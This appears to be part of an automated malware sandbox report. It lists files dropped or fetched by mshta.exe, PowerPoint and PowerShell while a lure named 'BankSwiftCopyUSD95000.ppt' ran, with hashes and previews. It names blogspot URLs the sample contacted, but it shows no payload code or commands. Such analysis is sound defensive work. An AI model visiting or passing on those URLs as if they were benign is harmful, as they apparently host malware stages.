                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:1536:gbSXNDKT4eyooGpV2UAWIGSDHhgoynJ3mYOqLZUf1o4FZeMe4at0YWLGkQYnWe9N:OS9y8heIRg+b4gYzjhW+G
                                                                                                                                                                                                            MD5:84FE5508BBFE1C53A62309FDEFE15D3D
                                                                                                                                                                                                            SHA1:53393903F80154A63BB018D34A22CB2710E533FB
                                                                                                                                                                                                            SHA-256:7E39CB5BA2B39A584E8A3FDC746AF5435381E4C43F9C541F5B3CF8159BF6FE23
                                                                                                                                                                                                            SHA-512:F11A830A4A2E260747D055C293CFF28B55262C0836D226572BA1C8EB8905064440D56AFD37D0BBE03F2361170AAF75D7B8F0AB3F6EEF6079F7F8382D89A2B5A2
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html dir="ltr"><head><title>Sensitive content warning</title>.<link href="//fonts.googleapis.com/css?family=Open+Sans:300" rel="stylesheet" type="text/css">.<meta content="adult" name="rating">.<link href="//fonts.googleapis.com/css?family=Open+Sans:300" rel="stylesheet" type="text/css">.<link href="//www.google.com/css/maia.css" rel="stylesheet" type="text/css">.<link href="https://www.blogger.com/static/v1/v-css/281434096-static_pages.css" rel="stylesheet" type="text/css">.<style type="text/css">. @font-face{font-family:'Material Icons Extended';font-style:normal;font-weight:400;src:url(//fonts.gstatic.com/s/materialiconsextended/v64/kJEjBvgX7BgnkSrUwT8UnLVc38YydejYY-oE_LvN.eot);}. </style></head>.<body class="lang_en rb"><script type="text/javascript">. window.ga=window.ga||function(){(ga.q=ga.q||[]).push(arguments)};ga.l=+new Date;. ga('create',. "UA-18003-7",. '
                                                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\blogin[3].htm
                                                                                                                                                                                                            Process:C:\Windows\System32\mshta.exe
                                                                                                                                                                                                            File Type:HTML document, ASCII text, with very long lines
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):8192
                                                                                                                                                                                                            Entropy (8bit):5.457584462246226
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:192:puqg3OqSB5cc8rELWyHvEODR2usCnyVas4PV6D8f:EqmbSj0xquahx
                                                                                                                                                                                                            MD5:10B58BA496D799C0235A21242608116F
                                                                                                                                                                                                            SHA1:85CEF1A13EBCEF0E4C2CF111AF0F7A458FBCA27E
                                                                                                                                                                                                            SHA-256:3E550C2C5FF69839A75EFCA67A23A000114E534A853F592A8083AA97D08DF270
                                                                                                                                                                                                            SHA-512:A083CCA0589874EB508F499F9563D38799D516D9C9C093213CD6AF55A08407A890E67AF1319695F752AC49A8213E8556FA6AC86E0CC37A2523381B3FFA3AABEC
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html dir="ltr"><head><title>Sensitive content warning</title>.<link href="//fonts.googleapis.com/css?family=Open+Sans:300" rel="stylesheet" type="text/css">.<meta content="adult" name="rating">.<link href="//fonts.googleapis.com/css?family=Open+Sans:300" rel="stylesheet" type="text/css">.<link href="//www.google.com/css/maia.css" rel="stylesheet" type="text/css">.<link href="https://www.blogger.com/static/v1/v-css/281434096-static_pages.css" rel="stylesheet" type="text/css">.<style type="text/css">. @font-face{font-family:'Material Icons Extended';font-style:normal;font-weight:400;src:url(//fonts.gstatic.com/s/materialiconsextended/v64/kJEjBvgX7BgnkSrUwT8UnLVc38YydejYY-oE_LvN.eot);}. </style></head>.<body class="lang_en rb"><script type="text/javascript">. window.ga=window.ga||function(){(ga.q=ga.q||[]).push(arguments)};ga.l=+new Date;. ga('create',. "UA-18003-7",. '
                                                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\error[1]
                                                                                                                                                                                                            Process:C:\Windows\System32\mshta.exe
                                                                                                                                                                                                            File Type:HTML document, UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):6494
                                                                                                                                                                                                            Entropy (8bit):5.459946526910292
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:96:vKFlZ/kxjqD9zqp36wxVJddFAdd5Ydddopdyddv+dd865FhlleXckVDucqKFlZ/P:C0pv+GkduSDl6LRl0pv+GkduSDl6LRa
                                                                                                                                                                                                            MD5:267E302C26E032132179DE088213355D
                                                                                                                                                                                                            SHA1:7BAB512125E561DE8CB6304F85E1C942F1144C52
                                                                                                                                                                                                            SHA-256:CB0BA3CA8EB46FDF94EECE50590E21BC1DF2000C0DF63E06C9E9D91F7EB0EFC9
                                                                                                                                                                                                            SHA-512:0C84328BB901154545D9EAF735847AAA9132CC937E3E694C40FA1339FBFC5FC716CD7C2FB4DEDCBCDDBCA1E0D39EC4EF4BBAD0C44F744452E3F2CC805C3016F4
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview: ...<HTML id=dlgError STYLE="font-family: ms sans serif; font-size: 8pt;..width: 41.4em; height: 24em">..<HEAD>..<meta http-equiv="Content-Type" content="text/html; charset=utf-8">..<META HTTP-EQUIV="MSThemeCompatible" CONTENT="Yes">..<TITLE id=dialogTitle>..Script Error..</TITLE>..<SCRIPT>..var L_Dialog_ErrorMessage = "An error has occurred in this dialog.";..var L_ErrorNumber_Text = "Error: ";..var L_ContinueScript_Message = "Do you want to debug the current page?";..var L_AffirmativeKeyCodeLowerCase_Number = 121;..var L_AffirmativeKeyCodeUpperCase_Number = 89;..var L_NegativeKeyCodeLowerCase_Number = 110;..var L_NegativeKeyCodeUpperCase_Number = 78;..</SCRIPT>..<SCRIPT LANGUAGE="JavaScript" src="error.js" defer></SCRIPT>..</HEAD>..<BODY ID=bdy onLoad="loadBdy()" style="font-family: 'ms sans serif';..font-size: 8pt; background: threedface; color: windowtext;" topmargin=0>..<CENTER id=ctrErrorMessage>..<table id=tbl1 cellPadding=3 cellspacing=3 border=0..style="background: buttonface
                                                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\error[2]
                                                                                                                                                                                                            Process:C:\Windows\System32\mshta.exe
                                                                                                                                                                                                            File Type:HTML document, UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):3247
                                                                                                                                                                                                            Entropy (8bit):5.459946526910292
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:96:vKFlZ/kxjqD9zqp36wxVJddFAdd5Ydddopdyddv+dd865FhlleXckVDuca:C0pv+GkduSDl6LRa
                                                                                                                                                                                                            MD5:16AA7C3BEBF9C1B84C9EE07666E3207F
                                                                                                                                                                                                            SHA1:BF0AFA2F8066EB7EE98216D70A160A6B58EC4AA1
                                                                                                                                                                                                            SHA-256:7990E703AE060C241EBA6257D963AF2ECF9C6F3FBDB57264C1D48DDA8171E754
                                                                                                                                                                                                            SHA-512:245559F757BAB9F3D63FB664AB8F2D51B9369E2B671CF785A6C9FB4723F014F5EC0D60F1F8555D870855CF9EB49F3951D98C62CBDF9E0DC1D28544966D4E70F1
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview: ...<HTML id=dlgError STYLE="font-family: ms sans serif; font-size: 8pt;..width: 41.4em; height: 24em">..<HEAD>..<meta http-equiv="Content-Type" content="text/html; charset=utf-8">..<META HTTP-EQUIV="MSThemeCompatible" CONTENT="Yes">..<TITLE id=dialogTitle>..Script Error..</TITLE>..<SCRIPT>..var L_Dialog_ErrorMessage = "An error has occurred in this dialog.";..var L_ErrorNumber_Text = "Error: ";..var L_ContinueScript_Message = "Do you want to debug the current page?";..var L_AffirmativeKeyCodeLowerCase_Number = 121;..var L_AffirmativeKeyCodeUpperCase_Number = 89;..var L_NegativeKeyCodeLowerCase_Number = 110;..var L_NegativeKeyCodeUpperCase_Number = 78;..</SCRIPT>..<SCRIPT LANGUAGE="JavaScript" src="error.js" defer></SCRIPT>..</HEAD>..<BODY ID=bdy onLoad="loadBdy()" style="font-family: 'ms sans serif';..font-size: 8pt; background: threedface; color: windowtext;" topmargin=0>..<CENTER id=ctrErrorMessage>..<table id=tbl1 cellPadding=3 cellspacing=3 border=0..style="background: buttonface
                                                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\icon18_edit_allbkg[1].gif
                                                                                                                                                                                                            Process:C:\Windows\System32\mshta.exe
                                                                                                                                                                                                            File Type:GIF image data, version 89a, 18 x 18
                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                            Size (bytes):162
                                                                                                                                                                                                            Entropy (8bit):6.20718596834588
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3:CUS9n21IZClSWEj5QQxlEGsSZpZcYES9XfLvlcDdcpFXn:HS9nSIUlSlNQQjEGsSJcYEowdcrX
                                                                                                                                                                                                            MD5:C991641178FF05ADF0D004298B5EAFA9
                                                                                                                                                                                                            SHA1:D8F6CE8ECD92B86D49849360F6B81CEB10B4C941
                                                                                                                                                                                                            SHA-256:CA9848E6006CFEC8F9FFA29433ADE8152204BDB95579200831C6DC0F53DFF70B
                                                                                                                                                                                                            SHA-512:6A845A5DB1F1388DF00F09FDE3787C5A8846C4F1F8041476BC011553821F9BD90FB2937AC10BE45EB5DD1749105CCD4F7339FAA044ECC7386CAF9B59B374EB3B
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            IE Cache URL:https://resources.blogblog.com/img/icon18_edit_allbkg.gif
                                                                                                                                                                                                            Preview: GIF89a..........j4TSP.%..........)I5.....S(..3&...1..#..!.......,..........O..I...`.......(..1......"N.(.!.3....wH.@..1...... ....ra..R...../..yL `M.J..;
                                                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\icon18_wrench_allbkg[1].png
                                                                                                                                                                                                            Process:C:\Windows\System32\mshta.exe
                                                                                                                                                                                                            File Type:PNG image data, 18 x 18, 8-bit colormap, non-interlaced
                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                            Size (bytes):475
                                                                                                                                                                                                            Entropy (8bit):7.239750626651385
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:12:6v/7ElZUJDdwjI5Fa4ep0LPf+veUxQn6/Xh0ptMQsfZhkNTpQEsb7:ZK1dw0etKjfUxQn6/x0DWrETpQZb7
                                                                                                                                                                                                            MD5:F617EFFE6D96C15ACFEA8B2E8AAE551F
                                                                                                                                                                                                            SHA1:6D676AF11AD2E84B620CCE4D5992B657CB2D8AB6
                                                                                                                                                                                                            SHA-256:D172D750493BE64A7ED84DEC1DD2A0D787BA42F78BC694B0858F152C52B6620B
                                                                                                                                                                                                            SHA-512:3189A6281AD065848AFC700A47BEA885CD3905DAE11CCB28B88C81D3B28F73F4DFA2D5D1883BB9325DC7729A32AA29B7D1181AE5752DF00F6931624B50571986
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            IE Cache URL:https://resources.blogblog.com/img/icon18_wrench_allbkg.png
                                                                                                                                                                                                            Preview: .PNG........IHDR.............a.~e....PLTE...... J.4e.............u..l..e..c{.......................................................................Y}.T|....`v.`w............................................................[q.............Eq....__^.......bY....tRNS.@..f....IDATx^M.U..1.@..A(33.Cf....qR...."..@....*.v&.g...X.="6.Xz.$/".3.;.R\....Mb.((...J...R...pK.OY.0...Q.....q.r3..r.v..b..j+..h.r...<._...l.}lY......o%....b..d,l/. ........N...ig.K.....IEND.B`.
                                                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\maia[1].css
                                                                                                                                                                                                            Process:C:\Windows\System32\mshta.exe
                                                                                                                                                                                                            File Type:UTF-8 Unicode text, with very long lines, with no line terminators
                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                            Size (bytes):43502
                                                                                                                                                                                                            Entropy (8bit):5.583970359912841
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:768:xwAbmEw+jAJFnSCZ9vWdmIfhjQucISYsU8/F+:bAJFnSC3W1QXISYsU8t+
                                                                                                                                                                                                            MD5:9E914FD11C5238C50EBA741A873F0896
                                                                                                                                                                                                            SHA1:950316FFEF900CEECCA4CF847C9A8C14231271DA
                                                                                                                                                                                                            SHA-256:8684A32D1A10D050A26FC33192EDF427A5F0C6874C590A68D77AE6E0D186BD8A
                                                                                                                                                                                                            SHA-512:362B96B27D3286396F53ECE74B1685FA915FC9A73E83F28E782B3F6A2B9F851BA9E37D79D93BD97AB7B3DC3C2D9B66B5E8F81151C8B65A17F4483E1484428E5F
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            IE Cache URL:https://www.google.com/css/maia.css
                                                                                                                                                                                                            Preview: @media screen,projection,print{html,input,textarea{font-family:arial,sans-serif}html.maia-noto:lang(ar),html.maia-noto:lang(ar) input,html.maia-noto:lang(ar) textarea{font-family:"Noto Naskh Arabic UI",arial,sans-serif}html{line-height:1.54}h5,h6,pre,table,input,textarea,code{font-size:1em}address,abbr,cite{font-style:normal}table{border-collapse:collapse;border-spacing:0}th{text-align:left}[dir=rtl] th{text-align:right}blockquote,q{font-style:italic}html[lang^=ja] blockquote,html[lang^=ja] q,html[lang^=ko] blockquote,html[lang^=ko] q,html[lang^=zh] blockquote,html[lang^=zh] q{font-style:normal}fieldset,iframe,img{border:0}q{quotes:none}sup,sub{line-height:0}html[lang^=ja] .ww,html[lang^=ko] .ww,html[lang^=zh] .ww{display:inline-block}}@media screen,projection{html,h4,h5,h6{font-size:13px}html{background:#fff;color:#444;padding:0 15px}body,fieldset{margin:0}h1,h2,h3,h4,em,i{font-weight:bold}h1,h2,h3,h4,blockquote,q{font-family:"open sans",arial,sans-serif}html.maia-noto:lang(ar) h1,htm
                                                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\share_buttons_20_3[1].png
                                                                                                                                                                                                            Process:C:\Windows\System32\mshta.exe
                                                                                                                                                                                                            File Type:PNG image data, 120 x 60, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                            Size (bytes):5080
                                                                                                                                                                                                            Entropy (8bit):7.934378623776424
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:96:fQF0nYNa08BXqtmthO92OamTM5TuqeKJbLcbIsZNB52O2LK:fQoYkLBpc92OamT0TeKxLCIsvB52OCK
                                                                                                                                                                                                            MD5:AD9999106D5F550920B586E8E1704E5A
                                                                                                                                                                                                            SHA1:93FD02C51166402A41F96509CD0CA3FB917877DD
                                                                                                                                                                                                            SHA-256:3829A5B2ADE7CFC416C80B8F3DF71E49E68672875F025D525223978F5CEE3FD3
                                                                                                                                                                                                            SHA-512:DE6552632F76A64C26FC0F27CCE741FBB383D60C62A4999A79023D3207B0FAB754CC975B4988B3F65CE481791C434D18D427CE3D98D7838AD0ED05A1D8125519
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            IE Cache URL:https://www.blogger.com/img/share_buttons_20_3.png
                                                                                                                                                                                                            Preview: .PNG........IHDR...x...<.......~.....IDATh...t.U..3=}l..V<==....m.O7.H; ..-zd.q............a..$..J .a.I.{0!l!I%$.$..}...'...._./.|.U..6Su....z....}U...........S.......H...................Gtt4v...E...o..{QQQ.U............\.r...+.j.*.6..V_...W.c........8..[...(//......p..9|..7R.x...L`k....]Z.~.K.6l.tn.u...4.pMM..9..g.J.....^w.BV...WUU...$........y......M.....D.......Sr,./^.I.W...x.!`.rXX..m.&..f.u.....V.Uj.}X.d..-[..C..h..cbb......y.........2..s...R.....d...qO.#\B=|.....9N..,@xx8..\./..R..5F.....\.....q.....I....r..K.....1c..y#...ptRGG...."$$DJ.....nBB....:.'r.....**..'.....Nq"z...cuL..R.xj.....1.5k.......KN.5k..q.9s........h.....`DD.......*.u..e.......z.L#s..a....`* ...X.|.l$ApVy.L.....l.mp.8I.M...0;.B...9...]...^...R`.q%={yyyr...p...AG.gSl.I....?_:..=..L....@..x...y...?/.....<H.......4==].*....a.'`z.._5P..;...j...9"s...}......z..,...(.Sl+....\.......1.x.#..~\.........K/....'2..wz..o.-.!.={.nN..#./C.hh..pd.m...x..5.L..u..@.\.q
                                                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\st2222[1].htm
                                                                                                                                                                                                            Process:C:\Windows\System32\mshta.exe
                                                                                                                                                                                                            File Type:HTML document, ASCII text, with very long lines
                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                            Size (bytes):246010
                                                                                                                                                                                                            Entropy (8bit):3.7271987098613337
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:768:d83eyHHvPWdKqaS2vc26nI2VbzU3Ej46xvfnVgoLS2S7b:d83LHH2dKqx2ZKI2Vc3Ej46vgoLy
                                                                                                                                                                                                            MD5:98E5D1F262EBFD9AFC2542E6F9A6A886
                                                                                                                                                                                                            SHA1:6802354CA8583B3A63C8E1CB285BA5257384894B
                                                                                                                                                                                                            SHA-256:0906CE83C6E40BB3EBDF2A2B648EB735E3EA53B75C16367EF1BB6930FD67E8EC
                                                                                                                                                                                                            SHA-512:B28BF5C412AF04A32975989C366E4D20DCE253EAD5022A34F1413DD46772483C2B114ABB7560FC19B248E8BAE866AE71DD771E96922BE047083DCE05F7CDCB47
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            IE Cache URL:https://mainjigijigi123.blogspot.com/p/st2222.html
                                                                                                                                                                                                            Preview: <!DOCTYPE html>.<html class='v2' dir='ltr' lang='en-GB'>.<head>.<link href='https://www.blogger.com/static/v1/widgets/3416767676-css_bundle_v2.css' rel='stylesheet' type='text/css'/>.<meta content='width=1100' name='viewport'/>.<meta content='text/html; charset=UTF-8' http-equiv='Content-Type'/>.<meta content='blogger' name='generator'/>.<link href='https://mainjigijigi123.blogspot.com/favicon.ico' rel='icon' type='image/x-icon'/>.<link href='https://mainjigijigi123.blogspot.com/p/st2222.html' rel='canonical'/>.<link rel="alternate" type="application/atom+xml" title="mainjigijigi - Atom" href="https://mainjigijigi123.blogspot.com/feeds/posts/default" />.<link rel="alternate" type="application/rss+xml" title="mainjigijigi - RSS" href="https://mainjigijigi123.blogspot.com/feeds/posts/default?alt=rss" />.<link rel="service.post" type="application/atom+xml" title="mainjigijigi - Atom" href="https://www.blogger.com/feeds/9116518222795791100/posts/default" />. [if IE]><script type="text/j
                                                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\stback1[1].htm
                                                                                                                                                                                                            Process:C:\Windows\System32\mshta.exe
                                                                                                                                                                                                            File Type:HTML document, ASCII text, with very long lines
                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                            Size (bytes):33773
                                                                                                                                                                                                            Entropy (8bit):5.536280135344462
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:768:itNq3eyHHvPWdCPJS2vc26nu5AkXnVgshXt+2SYn:itNq3LHH2dCPE2ZKu5AYgshXt/
                                                                                                                                                                                                            MD5:AD61696C5A1D04015DF2FF3709BD5E0D
                                                                                                                                                                                                            SHA1:73F6B22D0B12930A32CA6DFE19FE8D4A46F2E39D
                                                                                                                                                                                                            SHA-256:97CE2ADA8A44A9A8F2CCA726172792B2080B341254D2350DD56E4D5AD75B210C
                                                                                                                                                                                                            SHA-512:4111C05D9B591251A533DA1470DC6D7D00F421065A95F7FA5DF1B721C1C516DC456BE228F0FE18638F986201BE47AA51DE5D70E23B44AA5298196E45F1A4B87D
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            IE Cache URL:https://backbones1234511a.blogspot.com/p/stback1.html
                                                                                                                                                                                                            Preview: <!DOCTYPE html>.<html class='v2' dir='ltr' lang='en'>.<head>.<link href='https://www.blogger.com/static/v1/widgets/3416767676-css_bundle_v2.css' rel='stylesheet' type='text/css'/>.<meta content='width=1100' name='viewport'/>.<meta content='text/html; charset=UTF-8' http-equiv='Content-Type'/>.<meta content='blogger' name='generator'/>.<link href='https://backbones1234511a.blogspot.com/favicon.ico' rel='icon' type='image/x-icon'/>.<link href='https://backbones1234511a.blogspot.com/p/stback1.html' rel='canonical'/>.<link rel="alternate" type="application/atom+xml" title="backbones - Atom" href="https://backbones1234511a.blogspot.com/feeds/posts/default" />.<link rel="alternate" type="application/rss+xml" title="backbones - RSS" href="https://backbones1234511a.blogspot.com/feeds/posts/default?alt=rss" />.<link rel="service.post" type="application/atom+xml" title="backbones - Atom" href="https://www.blogger.com/feeds/7680886694920034828/posts/default" />. [if IE]><script type="text/java
                                                                                                                                                                                                            C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\BankSwiftCopyUSD95000.LNK
                                                                                                                                                                                                            Process:C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE
                                                                                                                                                                                                            File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Aug 26 14:08:14 2020, mtime=Wed Aug 26 14:08:14 2020, atime=Wed Jan 13 20:43:35 2021, length=104448, window=hide
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):2138
                                                                                                                                                                                                            Entropy (8bit):4.558696032471506
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:48:8TZ/XT0jkgX2nhO7Qh2TZ/XT0jkgX2nhO7Q/:8TZ/Xojk22E7Qh2TZ/Xojk22E7Q/
                                                                                                                                                                                                            MD5:D8B2787B913D71E0A0A5163A1FC63967
                                                                                                                                                                                                            SHA1:A7FE3DF765FDAB05C4BE82F0AB63B0F1BD3425C3
                                                                                                                                                                                                            SHA-256:F078FBE707E4D6C86A3DFCC8B175F978505C3A2DE77651BBCB799788A377BC1F
                                                                                                                                                                                                            SHA-512:30116C07A1B500ED664147BFAFDF228427E009DA10EC22CDA300FD1F3759A7B719BD27B3F48415F56B1968F0C67169B269830C15F8640DCCA36EF702CC441813
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview: L..................F.... ....d..{...d..{..n^.%.................................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......Q.y..user.8......QK.X.Q.y*...&=....U...............A.l.b.u.s.....z.1......Q.y..Desktop.d......QK.X.Q.y*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.....|.2.....-Rr. .BANKSW~1.PPT..`.......Q.y.Q.y*...8.....................B.a.n.k.S.w.i.f.t.C.o.p.y.U.S.D.9.5.0.0.0...p.p.t.......................-...8...[............?J......C:\Users\..#...................\\226546\Users.user\Desktop\BankSwiftCopyUSD95000.ppt.0.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.B.a.n.k.S.w.i.f.t.C.o.p.y.U.S.D.9.5.0.0.0...p.p.t.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......226546.........
                                                                                                                                                                                                            C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
                                                                                                                                                                                                            Process:C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE
                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):101
                                                                                                                                                                                                            Entropy (8bit):4.605215508179514
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3:e1E61Qcw2DhU/7Qcw2DhUmZ1E61Qcw2DhUv:e1C2FAC2F1C2F2
                                                                                                                                                                                                            MD5:5BB7084F6E424324054C931281C6DF42
                                                                                                                                                                                                            SHA1:DC56F7830AC51ADA1C311EED0BB358BB0459B680
                                                                                                                                                                                                            SHA-256:D89D12C522386DBDFF572982BDC69C10664078538D4AB16FA871FB81034DF01D
                                                                                                                                                                                                            SHA-512:F801ACE22A36CC0521F73B51198177F974AB9C0CC9FD1F66EB2B7A7EDCAF915C791361B5C76DDBA840C6AD0B367E110EC776CD9B003AEBFD92DA603205C4F011
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview: [ppt]..BankSwiftCopyUSD95000.LNK=0..BankSwiftCopyUSD95000.LNK=0..[ppt]..BankSwiftCopyUSD95000.LNK=0..
                                                                                                                                                                                                            C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\0C80LKLL3RNFORU629R4.temp
                                                                                                                                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):8016
                                                                                                                                                                                                            Entropy (8bit):3.5869379648879183
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:96:chQCsMq2yqvsqvJCwo1z8hQCsMq2yqvsEHyqvJCworbzbKKr8PHmZqR/MlUV/Iu:cyko1z8ywHnorbzbPxZqRPIu
                                                                                                                                                                                                            MD5:D62CC9CCF77316A2AA6A729F57925D11
                                                                                                                                                                                                            SHA1:00678A777EC4BF4C3AD3EA8B922FF9481CE5BFDC
                                                                                                                                                                                                            SHA-256:93390D2FE903C3BDD52EEB40A7A231B9D176C8C8B54AE580A6681F2E701ACED0
                                                                                                                                                                                                            SHA-512:8480FC261FDFF51E9BC8B9345A8532408E699FD60FF6A354B01E7DCCCC6F7AF991A8840790344B042029656AF0EFBB450E90DAA3A24E371EC4E3CC458B70FAF2
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview: ...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....{J.\. PROGRA~3..D.......:..{J.\*...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J|v. MICROS~1..@.......:..~J|v*...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;.*.........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((*...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1......Pf...Programs..f.......:...Pf.*...................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr.*...................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''*.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,*....=....................W.i.n.d.o.w.s.
                                                                                                                                                                                                            C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\3U3Q2FM73WBY1UE104TU.temp
                                                                                                                                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):8016
                                                                                                                                                                                                            Entropy (8bit):3.5869379648879183
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:96:chQCsMq2yqvsqvJCwo1z8hQCsMq2yqvsEHyqvJCworbzbKKr8PHmZqR/MlUV/Iu:cyko1z8ywHnorbzbPxZqRPIu
                                                                                                                                                                                                            MD5:D62CC9CCF77316A2AA6A729F57925D11
                                                                                                                                                                                                            SHA1:00678A777EC4BF4C3AD3EA8B922FF9481CE5BFDC
                                                                                                                                                                                                            SHA-256:93390D2FE903C3BDD52EEB40A7A231B9D176C8C8B54AE580A6681F2E701ACED0
                                                                                                                                                                                                            SHA-512:8480FC261FDFF51E9BC8B9345A8532408E699FD60FF6A354B01E7DCCCC6F7AF991A8840790344B042029656AF0EFBB450E90DAA3A24E371EC4E3CC458B70FAF2
                                                                                                                                                                                                            Malicious:false
